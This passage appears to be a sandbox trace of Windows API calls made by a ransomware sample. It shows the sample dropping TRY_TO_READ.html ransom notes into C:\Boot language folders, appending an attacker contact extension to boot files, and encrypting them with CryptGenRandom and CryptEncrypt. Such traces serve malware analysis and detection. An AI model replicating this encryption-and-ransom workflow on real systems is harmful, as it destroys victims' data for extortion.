cAlternateFileName="")) returned 1 [0116.500] HeapFree (in: hHeap=0x2e0000, dwFlags=0x0, lpMem=0x3240e0 | out: hHeap=0x2e0000) returned 1 [0116.500] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x0, Size=0x40) returned 0x3240e0 [0116.500] GetLastError () returned 0x0 [0116.500] SetLastError (dwErrCode=0x0) [0116.500] GetLastError () returned 0x0 [0116.501] SetLastError (dwErrCode=0x0) [0116.501] GetLastError () returned 0x0 [0116.501] SetLastError (dwErrCode=0x0) [0116.501] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x0, Size=0x20) returned 0x3506d8 [0116.501] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x0, Size=0x20) returned 0x350700 [0116.501] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x0, Size=0x20) returned 0x350728 [0116.501] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x0, Size=0x8) returned 0x330a38 [0116.501] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x0, Size=0x8) returned 0x330a48 [0116.501] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x0, Size=0x40) returned 0x324170 [0116.501] GetLastError () returned 0x0 [0116.501] SetLastError (dwErrCode=0x0) [0116.501] GetLastError () returned 0x0 [0116.501] SetLastError (dwErrCode=0x0) [0116.501] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x0, Size=0x40) returned 0x324200 [0116.501] CreateFileW (lpFileName="C:\\\\Boot\\tr-TR\\TRY_TO_READ.html" (normalized: "c:\\boot\\tr-tr\\try_to_read.html"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x3d8 [0116.502] HeapFree (in: hHeap=0x2e0000, dwFlags=0x0, lpMem=0x324200 | out: hHeap=0x2e0000) returned 1 [0116.502] WriteFile (in: hFile=0x3d8, lpBuffer=0x348ed8*, nNumberOfBytesToWrite=0x548, lpNumberOfBytesWritten=0x2acfb00, lpOverlapped=0x0 | out: lpBuffer=0x348ed8*, lpNumberOfBytesWritten=0x2acfb00*=0x548, lpOverlapped=0x0) returned 1 [0116.503] WriteFile (in: hFile=0x3d8, lpBuffer=0x45a1f8*, nNumberOfBytesToWrite=0xf28, lpNumberOfBytesWritten=0x2acfb00, lpOverlapped=0x0 | out: lpBuffer=0x45a1f8*, lpNumberOfBytesWritten=0x2acfb00*=0xf28, lpOverlapped=0x0) returned 1 [0116.503] WriteFile (in: hFile=0x3d8, lpBuffer=0x4428d0*, nNumberOfBytesToWrite=0x4b, lpNumberOfBytesWritten=0x2acfb00, lpOverlapped=0x0 | out: lpBuffer=0x4428d0*, lpNumberOfBytesWritten=0x2acfb00*=0x4b, lpOverlapped=0x0) returned 1 [0116.503] CloseHandle (hObject=0x3d8) returned 1 [0116.503] HeapFree (in: hHeap=0x2e0000, dwFlags=0x0, lpMem=0x324170 | out: hHeap=0x2e0000) returned 1 [0116.503] HeapFree (in: hHeap=0x2e0000, dwFlags=0x0, lpMem=0x330a48 | out: hHeap=0x2e0000) returned 1 [0116.503] HeapFree (in: hHeap=0x2e0000, dwFlags=0x0, lpMem=0x330a38 | out: hHeap=0x2e0000) returned 1 [0116.503] HeapFree (in: hHeap=0x2e0000, dwFlags=0x0, lpMem=0x350728 | out: hHeap=0x2e0000) returned 1 [0116.503] FindNextFileW (in: hFindFile=0x317b88, lpFindFileData=0x2acfb30 | out: lpFindFileData=0x2acfb30*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x96efd190, ftCreationTime.dwHighDateTime=0x1d5956e, ftLastAccessTime.dwLowDateTime=0x96efd190, ftLastAccessTime.dwHighDateTime=0x1d5956e, ftLastWriteTime.dwLowDateTime=0x96efd190, ftLastWriteTime.dwHighDateTime=0x1d5956e, nFileSizeHigh=0x0, nFileSizeLow=0x14bb, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="TRY_TO_READ.html", cAlternateFileName="TRY_TO~1.HTM")) returned 1 [0116.503] HeapFree (in: hHeap=0x2e0000, dwFlags=0x0, lpMem=0x3240e0 | out: hHeap=0x2e0000) returned 1 [0116.503] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x0, Size=0x40) returned 0x3240e0 [0116.503] GetLastError () returned 0x0 [0116.503] SetLastError (dwErrCode=0x0) [0116.504] GetLastError () returned 0x0 [0116.504] SetLastError (dwErrCode=0x0) [0116.504] GetLastError () returned 0x0 [0116.504] SetLastError (dwErrCode=0x0) [0116.504] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x0, Size=0x30) returned 0x3446c0 [0116.504] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x0, Size=0x30) returned 0x3446f8 [0116.504] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x0, Size=0x40) returned 0x324170 [0116.504] HeapFree (in: hHeap=0x2e0000, dwFlags=0x0, lpMem=0x324170 | out: hHeap=0x2e0000) returned 1 [0116.504] HeapFree (in: hHeap=0x2e0000, dwFlags=0x0, lpMem=0x3446f8 | out: hHeap=0x2e0000) returned 1 [0116.504] HeapFree (in: hHeap=0x2e0000, dwFlags=0x0, lpMem=0x3446c0 | out: hHeap=0x2e0000) returned 1 [0116.504] FindNextFileW (in: hFindFile=0x317b88, lpFindFileData=0x2acfb30 | out: lpFindFileData=0x2acfb30*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac0d3720, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac0d3720, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xac0d3720, ftLastWriteTime.dwHighDateTime=0x1d2de32, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="zh-CN", cAlternateFileName="")) returned 1 [0116.504] HeapFree (in: hHeap=0x2e0000, dwFlags=0x0, lpMem=0x3240e0 | out: hHeap=0x2e0000) returned 1 [0116.504] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x0, Size=0x40) returned 0x3240e0 [0116.504] GetLastError () returned 0x0 [0116.504] SetLastError (dwErrCode=0x0) [0116.504] GetLastError () returned 0x0 [0116.504] SetLastError (dwErrCode=0x0) [0116.504] GetLastError () returned 0x0 [0116.504] SetLastError (dwErrCode=0x0) [0116.504] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x0, Size=0x20) returned 0x350728 [0116.504] GetLastError () returned 0x0 [0116.504] SetLastError (dwErrCode=0x0) [0116.504] GetLastError () returned 0x0 [0116.504] SetLastError (dwErrCode=0x0) [0116.504] CreateFileW (lpFileName="C:\\\\Boot\\zh-CN\\TRY_TO_READ.html" (normalized: "c:\\boot\\zh-cn\\try_to_read.html"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x3d8 [0116.505] HeapFree (in: hHeap=0x2e0000, dwFlags=0x0, lpMem=0x324200 | out: hHeap=0x2e0000) returned 1 [0116.505] WriteFile (in: hFile=0x3d8, lpBuffer=0x348ed8*, nNumberOfBytesToWrite=0x548, lpNumberOfBytesWritten=0x2acfb00, lpOverlapped=0x0 | out: lpBuffer=0x348ed8*, lpNumberOfBytesWritten=0x2acfb00*=0x548, lpOverlapped=0x0) returned 1 [0116.506] WriteFile (in: hFile=0x3d8, lpBuffer=0x45a1f8*, nNumberOfBytesToWrite=0xf28, lpNumberOfBytesWritten=0x2acfb00, lpOverlapped=0x0 | out: lpBuffer=0x45a1f8*, lpNumberOfBytesWritten=0x2acfb00*=0xf28, lpOverlapped=0x0) returned 1 [0116.506] WriteFile (in: hFile=0x3d8, lpBuffer=0x4428d0*, nNumberOfBytesToWrite=0x4b, lpNumberOfBytesWritten=0x2acfb00, lpOverlapped=0x0 | out: lpBuffer=0x4428d0*, lpNumberOfBytesWritten=0x2acfb00*=0x4b, lpOverlapped=0x0) returned 1 [0116.506] CloseHandle (hObject=0x3d8) returned 1 [0116.506] HeapFree (in: hHeap=0x2e0000, dwFlags=0x0, lpMem=0x324170 | out: hHeap=0x2e0000) returned 1 [0116.506] HeapFree (in: hHeap=0x2e0000, dwFlags=0x0, lpMem=0x330a48 | out: hHeap=0x2e0000) returned 1 [0116.506] HeapFree (in: hHeap=0x2e0000, dwFlags=0x0, lpMem=0x330a38 | out: hHeap=0x2e0000) returned 1 [0116.506] HeapFree (in: hHeap=0x2e0000, dwFlags=0x0, lpMem=0x350778 | out: hHeap=0x2e0000) returned 1 [0116.506] FindNextFileW (in: hFindFile=0x317b88, lpFindFileData=0x2acfb30 | out: lpFindFileData=0x2acfb30*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac0f9880, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac0f9880, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xac0f9880, ftLastWriteTime.dwHighDateTime=0x1d2de32, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="zh-HK", cAlternateFileName="")) returned 1 [0116.506] HeapFree (in: hHeap=0x2e0000, dwFlags=0x0, lpMem=0x3240e0 | out: hHeap=0x2e0000) returned 1 [0116.506] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x0, Size=0x40) returned 0x3240e0 [0116.506] GetLastError () returned 0x0 [0116.506] SetLastError (dwErrCode=0x0) [0116.506] GetLastError () returned 0x0 [0116.507] SetLastError (dwErrCode=0x0) [0116.507] GetLastError () returned 0x0 [0116.507] SetLastError (dwErrCode=0x0) [0116.507] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x0, Size=0x20) returned 0x350778 [0116.507] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x0, Size=0x20) returned 0x3507a0 [0116.507] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x0, Size=0x20) returned 0x3507c8 [0116.507] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x0, Size=0x8) returned 0x330a38 [0116.507] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x0, Size=0x8) returned 0x330a48 [0116.507] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x0, Size=0x40) returned 0x324170 [0116.507] GetLastError () returned 0x0 [0116.507] SetLastError (dwErrCode=0x0) [0116.507] GetLastError () returned 0x0 [0116.507] SetLastError (dwErrCode=0x0) [0116.507] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x0, Size=0x40) returned 0x324200 [0116.507] CreateFileW (lpFileName="C:\\\\Boot\\zh-HK\\TRY_TO_READ.html" (normalized: "c:\\boot\\zh-hk\\try_to_read.html"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x3d8 [0116.508] HeapFree (in: hHeap=0x2e0000, dwFlags=0x0, lpMem=0x324200 | out: hHeap=0x2e0000) returned 1 [0116.508] WriteFile (in: hFile=0x3d8, lpBuffer=0x348ed8*, nNumberOfBytesToWrite=0x548, lpNumberOfBytesWritten=0x2acfb00, lpOverlapped=0x0 | out: lpBuffer=0x348ed8*, lpNumberOfBytesWritten=0x2acfb00*=0x548, lpOverlapped=0x0) returned 1 [0116.509] WriteFile (in: hFile=0x3d8, lpBuffer=0x45a1f8*, nNumberOfBytesToWrite=0xf28, lpNumberOfBytesWritten=0x2acfb00, lpOverlapped=0x0 | out: lpBuffer=0x45a1f8*, lpNumberOfBytesWritten=0x2acfb00*=0xf28, lpOverlapped=0x0) returned 1 [0116.509] WriteFile (in: hFile=0x3d8, lpBuffer=0x4428d0*, nNumberOfBytesToWrite=0x4b, lpNumberOfBytesWritten=0x2acfb00, lpOverlapped=0x0 | out: lpBuffer=0x4428d0*, lpNumberOfBytesWritten=0x2acfb00*=0x4b, lpOverlapped=0x0) returned 1 [0116.509] CloseHandle (hObject=0x3d8) returned 1 [0116.509] HeapFree (in: hHeap=0x2e0000, dwFlags=0x0, lpMem=0x324170 | out: hHeap=0x2e0000) returned 1 [0116.509] HeapFree (in: hHeap=0x2e0000, dwFlags=0x0, lpMem=0x330a48 | out: hHeap=0x2e0000) returned 1 [0116.509] HeapFree (in: hHeap=0x2e0000, dwFlags=0x0, lpMem=0x330a38 | out: hHeap=0x2e0000) returned 1 [0116.509] HeapFree (in: hHeap=0x2e0000, dwFlags=0x0, lpMem=0x3507c8 | out: hHeap=0x2e0000) returned 1 [0116.509] FindNextFileW (in: hFindFile=0x317b88, lpFindFileData=0x2acfb30 | out: lpFindFileData=0x2acfb30*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac0f9880, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac0f9880, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xac0f9880, ftLastWriteTime.dwHighDateTime=0x1d2de32, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="zh-TW", cAlternateFileName="")) returned 1 [0116.509] HeapFree (in: hHeap=0x2e0000, dwFlags=0x0, lpMem=0x3240e0 | out: hHeap=0x2e0000) returned 1 [0116.509] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x0, Size=0x40) returned 0x3240e0 [0116.509] GetLastError () returned 0x0 [0116.510] SetLastError (dwErrCode=0x0) [0116.510] GetLastError () returned 0x0 [0116.510] SetLastError (dwErrCode=0x0) [0116.510] GetLastError () returned 0x0 [0116.510] SetLastError (dwErrCode=0x0) [0116.510] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x0, Size=0x20) returned 0x3507c8 [0116.510] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x0, Size=0x20) returned 0x3507f0 [0116.510] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x0, Size=0x20) returned 0x350818 [0116.510] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x0, Size=0x8) returned 0x330a38 [0116.510] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x0, Size=0x8) returned 0x330a48 [0116.510] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x0, Size=0x40) returned 0x324170 [0116.510] GetLastError () returned 0x0 [0116.510] SetLastError (dwErrCode=0x0) [0116.510] GetLastError () returned 0x0 [0116.510] SetLastError (dwErrCode=0x0) [0116.510] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x0, Size=0x40) returned 0x324200 [0116.510] CreateFileW (lpFileName="C:\\\\Boot\\zh-TW\\TRY_TO_READ.html" (normalized: "c:\\boot\\zh-tw\\try_to_read.html"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x3d8 [0116.510] HeapFree (in: hHeap=0x2e0000, dwFlags=0x0, lpMem=0x324200 | out: hHeap=0x2e0000) returned 1 [0116.511] WriteFile (in: hFile=0x3d8, lpBuffer=0x348ed8*, nNumberOfBytesToWrite=0x548, lpNumberOfBytesWritten=0x2acfb00, lpOverlapped=0x0 | out: lpBuffer=0x348ed8*, lpNumberOfBytesWritten=0x2acfb00*=0x548, lpOverlapped=0x0) returned 1 [0116.511] WriteFile (in: hFile=0x3d8, lpBuffer=0x45a1f8*, nNumberOfBytesToWrite=0xf28, lpNumberOfBytesWritten=0x2acfb00, lpOverlapped=0x0 | out: lpBuffer=0x45a1f8*, lpNumberOfBytesWritten=0x2acfb00*=0xf28, lpOverlapped=0x0) returned 1 [0116.511] WriteFile (in: hFile=0x3d8, lpBuffer=0x4428d0*, nNumberOfBytesToWrite=0x4b, lpNumberOfBytesWritten=0x2acfb00, lpOverlapped=0x0 | out: lpBuffer=0x4428d0*, lpNumberOfBytesWritten=0x2acfb00*=0x4b, lpOverlapped=0x0) returned 1 [0116.512] CloseHandle (hObject=0x3d8) returned 1 [0116.512] HeapFree (in: hHeap=0x2e0000, dwFlags=0x0, lpMem=0x324170 | out: hHeap=0x2e0000) returned 1 [0116.512] HeapFree (in: hHeap=0x2e0000, dwFlags=0x0, lpMem=0x330a48 | out: hHeap=0x2e0000) returned 1 [0116.512] HeapFree (in: hHeap=0x2e0000, dwFlags=0x0, lpMem=0x330a38 | out: hHeap=0x2e0000) returned 1 [0116.512] HeapFree (in: hHeap=0x2e0000, dwFlags=0x0, lpMem=0x350818 | out: hHeap=0x2e0000) returned 1 [0116.512] FindNextFileW (in: hFindFile=0x317b88, lpFindFileData=0x2acfb30 | out: lpFindFileData=0x2acfb30*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac0f9880, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac0f9880, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xac0f9880, ftLastWriteTime.dwHighDateTime=0x1d2de32, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="zh-TW", cAlternateFileName="")) returned 0 [0116.512] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x0, Size=0x30) returned 0x3446c0 [0116.512] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x0, Size=0x100) returned 0x30e020 [0116.512] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x0, Size=0x8) returned 0x330a38 [0116.512] CryptGenRandom (in: hProv=0x3289b8, dwLen=0x20, pbBuffer=0x30e020 | out: pbBuffer=0x30e020) returned 1 [0116.512] CryptGenRandom (in: hProv=0x3289b8, dwLen=0x8, pbBuffer=0x330a38 | out: pbBuffer=0x330a38) returned 1 [0116.512] SetFileAttributesW (lpFileName="C:\\\\Boot\\memtest.exe", dwFileAttributes=0x80) returned 0 [0116.512] lstrlenW (lpString="C:\\\\Boot\\memtest.exe") returned 20 [0116.512] GetProcessHeap () returned 0x2e0000 [0116.512] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x0, Size=0x8e) returned 0x30e4b0 [0116.512] lstrcpyW (in: lpString1=0x30e4b0, lpString2="C:\\\\Boot\\memtest.exe" | out: lpString1="C:\\\\Boot\\memtest.exe") returned="C:\\\\Boot\\memtest.exe" [0116.512] lstrcatW (in: lpString1="C:\\\\Boot\\memtest.exe", lpString2=".12781717671972518758.ex_parvis@aol.com.AIR" | out: lpString1="C:\\\\Boot\\memtest.exe.12781717671972518758.ex_parvis@aol.com.AIR") returned="C:\\\\Boot\\memtest.exe.12781717671972518758.ex_parvis@aol.com.AIR" [0116.512] MoveFileExW (lpExistingFileName="C:\\\\Boot\\memtest.exe" (normalized: "c:\\boot\\memtest.exe"), lpNewFileName="C:\\\\Boot\\memtest.exe.12781717671972518758.ex_parvis@aol.com.AIR" (normalized: "c:\\boot\\memtest.exe.12781717671972518758.ex_parvis@aol.com.air"), dwFlags=0x8) returned 0 [0116.512] CreateFileW (lpFileName="C:\\\\Boot\\memtest.exe.12781717671972518758.ex_parvis@aol.com.AIR" (normalized: "c:\\boot\\memtest.exe.12781717671972518758.ex_parvis@aol.com.air"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0116.513] GetProcessHeap () returned 0x2e0000 [0116.513] HeapFree (in: hHeap=0x2e0000, dwFlags=0x0, lpMem=0x30e4b0 | out: hHeap=0x2e0000) returned 1 [0116.513] CloseHandle (hObject=0xffffffff) returned 0 [0116.513] HeapFree (in: hHeap=0x2e0000, dwFlags=0x0, lpMem=0x3446c0 | out: hHeap=0x2e0000) returned 1 [0116.513] HeapFree (in: hHeap=0x2e0000, dwFlags=0x0, lpMem=0x344688 | out: hHeap=0x2e0000) returned 1 [0116.513] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x0, Size=0x30) returned 0x344688 [0116.513] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x0, Size=0x100) returned 0x350e98 [0116.513] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x0, Size=0x8) returned 0x330a48 [0116.513] CryptGenRandom (in: hProv=0x3289b8, dwLen=0x20, pbBuffer=0x350e98 | out: pbBuffer=0x350e98) returned 1 [0116.513] CryptGenRandom (in: hProv=0x3289b8, dwLen=0x8, pbBuffer=0x330a48 | out: pbBuffer=0x330a48) returned 1 [0116.513] SetFileAttributesW (lpFileName="C:\\\\Boot\\BOOTSTAT.DAT", dwFileAttributes=0x80) returned 1 [0116.513] lstrlenW (lpString="C:\\\\Boot\\BOOTSTAT.DAT") returned 21 [0116.513] GetProcessHeap () returned 0x2e0000 [0116.513] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x0, Size=0x90) returned 0x30e4b0 [0116.513] lstrcpyW (in: lpString1=0x30e4b0, lpString2="C:\\\\Boot\\BOOTSTAT.DAT" | out: lpString1="C:\\\\Boot\\BOOTSTAT.DAT") returned="C:\\\\Boot\\BOOTSTAT.DAT" [0116.513] lstrcatW (in: lpString1="C:\\\\Boot\\BOOTSTAT.DAT", lpString2=".12781717671972518758.ex_parvis@aol.com.AIR" | out: lpString1="C:\\\\Boot\\BOOTSTAT.DAT.12781717671972518758.ex_parvis@aol.com.AIR") returned="C:\\\\Boot\\BOOTSTAT.DAT.12781717671972518758.ex_parvis@aol.com.AIR" [0116.513] MoveFileExW (lpExistingFileName="C:\\\\Boot\\BOOTSTAT.DAT" (normalized: "c:\\boot\\bootstat.dat"), lpNewFileName="C:\\\\Boot\\BOOTSTAT.DAT.12781717671972518758.ex_parvis@aol.com.AIR" (normalized: "c:\\boot\\bootstat.dat.12781717671972518758.ex_parvis@aol.com.air"), dwFlags=0x8) returned 1 [0116.517] CreateFileW (lpFileName="C:\\\\Boot\\BOOTSTAT.DAT.12781717671972518758.ex_parvis@aol.com.AIR" (normalized: "c:\\boot\\bootstat.dat.12781717671972518758.ex_parvis@aol.com.air"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x3d8 [0116.517] GetProcessHeap () returned 0x2e0000 [0116.517] HeapFree (in: hHeap=0x2e0000, dwFlags=0x0, lpMem=0x30e4b0 | out: hHeap=0x2e0000) returned 1 [0116.517] GetFileSizeEx (in: hFile=0x3d8, lpFileSize=0x2acf98c | out: lpFileSize=0x2acf98c*=65536) returned 1 [0116.517] SetFilePointer (in: hFile=0x3d8, lDistanceToMove=0, lpDistanceToMoveHigh=0x2acf9a8*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2acf9a8*=0) returned 0x10000 [0116.517] CryptEncrypt (in: hKey=0x317a48, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x2acf9c4*=0x20, dwBufLen=0x20 | out: pbData=0x0*, pdwDataLen=0x2acf9c4*=0x100) returned 1 [0116.517] GetProcessHeap () returned 0x2e0000 [0116.517] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x8, Size=0x100) returned 0x350fa0 [0116.517] CryptEncrypt (in: hKey=0x317a48, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x350fa0*, pdwDataLen=0x2acf9b4*=0x20, dwBufLen=0x100 | out: pbData=0x350fa0*, pdwDataLen=0x2acf9b4*=0x100) returned 1 [0116.517] WriteFile (in: hFile=0x3d8, lpBuffer=0x350fa0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2acf9c8, lpOverlapped=0x0 | out: lpBuffer=0x350fa0*, lpNumberOfBytesWritten=0x2acf9c8*=0x100, lpOverlapped=0x0) returned 1 [0116.518] WriteFile (in: hFile=0x3d8, lpBuffer=0x330a48*, nNumberOfBytesToWrite=0x8, lpNumberOfBytesWritten=0x2acf9c8, lpOverlapped=0x0 | out: lpBuffer=0x330a48*, lpNumberOfBytesWritten=0x2acf9c8*=0x8, lpOverlapped=0x0) returned 1 [0116.518] WriteFile (in: hFile=0x3d8, lpBuffer=0x330a48*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x2acf9c8, lpOverlapped=0x0 | out: lpBuffer=0x330a48*, lpNumberOfBytesWritten=0x2acf9c8*=0x4, lpOverlapped=0x0) returned 1 [0116.518] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x0, Size=0x10000) returned 0x3510a8 [0116.518] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x0, Size=0x10000) returned 0x3610b0 [0116.519] SetFilePointer (in: hFile=0x3d8, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0116.519] ReadFile (in: hFile=0x3d8, lpBuffer=0x3510a8, nNumberOfBytesToRead=0x10000, lpNumberOfBytesRead=0x2acf9c8, lpOverlapped=0x0 | out: lpBuffer=0x3510a8*, lpNumberOfBytesRead=0x2acf9c8*=0x10000, lpOverlapped=0x0) returned 1 [0116.520] SetFilePointer (in: hFile=0x3d8, lDistanceToMove=-65536, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0116.520] WriteFile (in: hFile=0x3d8, lpBuffer=0x3610b0*, nNumberOfBytesToWrite=0x10000, lpNumberOfBytesWritten=0x2acf9c8, lpOverlapped=0x0 | out: lpBuffer=0x3610b0*, lpNumberOfBytesWritten=0x2acf9c8*=0x10000, lpOverlapped=0x0) returned 1 [0116.521] HeapFree (in: hHeap=0x2e0000, dwFlags=0x0, lpMem=0x3510a8 | out: hHeap=0x2e0000) returned 1 [0116.521] HeapFree (in: hHeap=0x2e0000, dwFlags=0x0, lpMem=0x3610b0 | out: hHeap=0x2e0000) returned 1 [0116.522] CloseHandle (hObject=0x3d8) returned 1 [0116.523] GetProcessHeap () returned 0x2e0000 [0116.523] HeapFree (in: hHeap=0x2e0000, dwFlags=0x0, lpMem=0x350fa0 | out: hHeap=0x2e0000) returned 1 [0116.523] HeapFree (in: hHeap=0x2e0000, dwFlags=0x0, lpMem=0x350e98 | out: hHeap=0x2e0000) returned 1 [0116.523] HeapFree (in: hHeap=0x2e0000, dwFlags=0x0, lpMem=0x330a48 | out: hHeap=0x2e0000) returned 1 [0116.523] HeapFree (in: hHeap=0x2e0000, dwFlags=0x0, lpMem=0x344688 | out: hHeap=0x2e0000) returned 1 [0116.523] HeapFree (in: hHeap=0x2e0000, dwFlags=0x0, lpMem=0x344618 | out: hHeap=0x2e0000) returned 1 [0116.523] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x0, Size=0x30) returned 0x344618 [0116.523] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x0, Size=0x100) returned 0x350e98 [0116.523] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x0, Size=0x8) returned 0x330a48 [0116.523] CryptGenRandom (in: hProv=0x3289b8, dwLen=0x20, pbBuffer=0x350e98 | out: pbBuffer=0x350e98) returned 1 [0116.523] CryptGenRandom (in: hProv=0x3289b8, dwLen=0x8, pbBuffer=0x330a48 | out: pbBuffer=0x330a48) returned 1 [0116.523] SetFileAttributesW (lpFileName="C:\\\\Boot\\BCD.LOG2", dwFileAttributes=0x80) returned 1 [0116.524] lstrlenW (lpString="C:\\\\Boot\\BCD.LOG2") returned 17 [0116.524] GetProcessHeap () returned 0x2e0000 [0116.524] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x0, Size=0x88) returned 0x30e4b0 [0116.524] lstrcpyW (in: lpString1=0x30e4b0, lpString2="C:\\\\Boot\\BCD.LOG2" | out: lpString1="C:\\\\Boot\\BCD.LOG2") returned="C:\\\\Boot\\BCD.LOG2" [0116.524] lstrcatW (in: lpString1="C:\\\\Boot\\BCD.LOG2", lpString2=".12781717671972518758.ex_parvis@aol.com.AIR" | out: lpString1="C:\\\\Boot\\BCD.LOG2.12781717671972518758.ex_parvis@aol.com.AIR") returned="C:\\\\Boot\\BCD.LOG2.12781717671972518758.ex_parvis@aol.com.AIR" [0116.524] MoveFileExW (lpExistingFileName="C:\\\\Boot\\BCD.LOG2" (normalized: "c:\\boot\\bcd.log2"), lpNewFileName="C:\\\\Boot\\BCD.LOG2.12781717671972518758.ex_parvis@aol.com.AIR" (normalized: "c:\\boot\\bcd.log2.12781717671972518758.ex_parvis@aol.com.air"), dwFlags=0x8) returned 1 [0116.526] CreateFileW (lpFileName="C:\\\\Boot\\BCD.LOG2.12781717671972518758.ex_parvis@aol.com.AIR" (normalized: "c:\\boot\\bcd.log2.12781717671972518758.ex_parvis@aol.com.air"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x3d8 [0116.526] GetProcessHeap () returned 0x2e0000 [0116.526] HeapFree (in: hHeap=0x2e0000, dwFlags=0x0, lpMem=0x30e4b0 | out: hHeap=0x2e0000) returned 1 [0116.526] GetFileSizeEx (in: hFile=0x3d8, lpFileSize=0x2acf98c | out: lpFileSize=0x2acf98c*=0) returned 1 [0116.526] SetFilePointer (in: hFile=0x3d8, lDistanceToMove=0, lpDistanceToMoveHigh=0x2acf9a8*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2acf9a8*=0) returned 0x0 [0116.526] CryptEncrypt (in: hKey=0x317a48, 